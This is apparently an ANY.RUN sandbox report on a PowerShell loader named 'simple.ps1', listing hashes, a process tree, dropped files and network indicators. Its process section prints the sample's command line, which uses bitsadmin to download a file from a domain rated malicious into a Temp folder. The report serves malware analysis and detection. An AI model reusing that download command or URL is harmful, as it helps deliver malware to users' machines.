analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

simple.ps1

Full analysis: https://app.any.run/tasks/8737d78b-1c03-4572-8ff8-e27b6568d433
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2019, 13:21:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

A02DAF650B300C0E1EF56A4BE05672E3

SHA1:

17834AAB767FBB3C3D8D309575B97E8564E10F61

SHA256:

E6DA8C7928D3F7B3C7063B13B10D1DD11C65DB8B76C6ACFE5F9328856C17347D

SSDEEP:

6:G763ZKQv4+MCi0b03vp7Nb6hn23fNKQF8Nhn23fw+VlCI/rBJ2iIoJf:L8QvCY0fdNbS21KQin2zVlrqiIEf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 4044)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 1324)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1324)
    • Creates files in the user directory

      • powershell.exe (PID: 1324)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powershell.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1324"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\simple.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4044"C:\Windows\system32\cmd.exe" /C bitsadmin /transfer GFMrnkOy /download "https://invf.eu/view/main.php?ch=1" C:\Users\admin\AppData\Local\Temp1.txt C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2368bitsadmin /transfer GFMrnkOy /download "https://invf.eu/view/main.php?ch=1" C:\Users\admin\AppData\Local\Temp1.txt C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
246
Read events
187
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
1324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EKZSPPF1IGW04SYBM1CO.temp
MD5:
SHA256:
1324powershell.exeC:\Users\admin\AppData\Local\Temp2.ps1text
MD5:4836DDB4A69D864EA83BE42CC7DA03C4
SHA256:7E5C760D257D009F1B33CAB419E13C55E0FB4CB22A8123F21E10C402BA2D0C42
1324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a6f8.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.117.89.222:443
invf.eu
Portlane AB
SE
malicious

DNS requests

Domain
IP
Reputation
invf.eu
  • 185.117.89.222
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info